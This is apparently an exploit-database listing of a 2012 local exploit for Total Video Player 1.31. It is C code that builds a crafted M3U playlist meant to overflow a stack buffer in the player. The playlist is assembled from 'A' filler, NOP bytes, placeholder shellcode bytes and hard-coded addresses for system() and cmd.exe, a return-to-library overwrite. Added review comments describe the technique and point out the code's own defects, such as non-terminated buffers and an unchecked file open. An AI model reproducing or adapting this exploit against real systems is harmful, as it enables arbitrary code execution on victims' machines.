Total Video Player V1.31 m3u playlist exploit



EKU-ID: 2605 CVE: OSVDB-ID:
Author: GoTr00t Published: 2012-08-29 Verified: Verified


/*
28-08-2012 
Total Video Player V1.31 m3u playlist exploit
Local Exploit
Written by GoTr00t
Tested on Windows 7
aksuumit[at]hotmail.com
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>


/*
 * Proof-of-concept generator: builds one M3U playlist in memory and writes
 * it to "exploit.m3u" in the current directory. It does nothing else (no
 * network access, no process launch); the effect is in the file it produces.
 *
 * File layout, in order: the "#EXTM3U" / "#EXTINF" header lines, then a single
 * entry that starts with "c:\" and continues with 'A' filler, 0x90 filler,
 * 0x55 placeholder bytes and three 4-byte little-endian values. Going by the
 * author's variable names (overflow, newEIP), the over-long entry is meant to
 * overrun a stack buffer in the player's playlist parser and replace a saved
 * return address -- presumably; the vulnerable code is not shown on this page.
 *
 * Defender view: the observable trait of the output is a playlist entry
 * several hundred bytes long that contains non-printable bytes. The fix
 * belongs in the parser (bound the entry length before copying it).
 *
 * NOTE(review): the program's own output is not well defined. Several local
 * buffers are passed to strcat() without a terminating NUL (see the inline
 * notes), so the bytes actually written can vary between builds and runs.
 *
 * Returns 0 unconditionally.
 */
int main()
{                          
    // Assembly buffer for the whole playlist; zero-filled so the strcpy/strcat
    // chain below starts from an empty string.
    char exploit[3000];
    memset(exploit,0x00,sizeof(exploit));
    
    // 303 bytes of 'A' (0x41) filler. NOTE(review): the last byte of the array
    // is never written, so NUL termination is not guaranteed.
    char overflow[304];
    memset(overflow,0x41,sizeof(overflow)-1);
    
    // 40 bytes of 0x90. NOTE(review): the array is filled completely, leaving
    // no terminating NUL; passing it to strcat() is undefined behaviour.
    char nops[40];
    memset(nops,0x90,sizeof(nops));
    
    // 160 bytes of 0x55 used as a stand-in; no real payload is present in this
    // listing. NOTE(review): also filled completely, so not NUL-terminated.
    char shellcode[160];
    memset(shellcode,0x55,sizeof(shellcode)); 
    
    // Playlist header lines that precede the single entry.
    char HEADER[] = "#EXTM3U\n#EXTINF:,\n";
    
    // 7694B177 address of system in the msvcrt.dll 
    // Stored little-endian. This is an absolute address from the author's test
    // system (header says Windows 7); it is only meaningful where the module
    // loads at the same base, which ASLR is designed to prevent.
    char newEIP[] = "\x77\xB1\x94\x76";
    
    // Concatenate the pieces in file order. None of these calls checks the
    // remaining space in exploit[]; the nominal total is well under 3000
    // bytes, but that holds only if every source is NUL-terminated.
    strcpy(exploit,HEADER);
    strcat(exploit,"c:\\");
    strcat(exploit,overflow);
    strcat(exploit,nops);       
    strcat(exploit,shellcode); // fake shellcode because there are multiple ways to exploit this vulnerability you can place a shellcode here 
    strcat(exploit,newEIP);    // and use this EIP to jump to the shellcode  but for this example i use a return2dll technique
    strcat(exploit,"\x44\x44\x44\x44"); // junk or you can use this one to jump to another dll to execute so you can do a ROP to bypass protection
    
    // 7638BF27  cmd.exe
    // Second hard-coded absolute address (little-endian), with the same
    // portability caveat as newEIP above.
    strcat(exploit,"\x27\xBF\x38\x76");
    
    // Write a exploit playlist 
    // NOTE(review): fopen() is not checked, so a failed open passes NULL to
    // fprintf()/fclose(). The buffer is also used as the format string itself
    // rather than as an argument to "%s"; none of the bytes assembled above is
    // '%', but this is the non-literal format string pattern to avoid.
    FILE *fp = fopen("exploit.m3u","w");
    fprintf(fp,exploit);
    fclose(fp);
    
    // Printed regardless of whether the write succeeded.
    printf("Exploit written!\n");
    
    return 0;    
}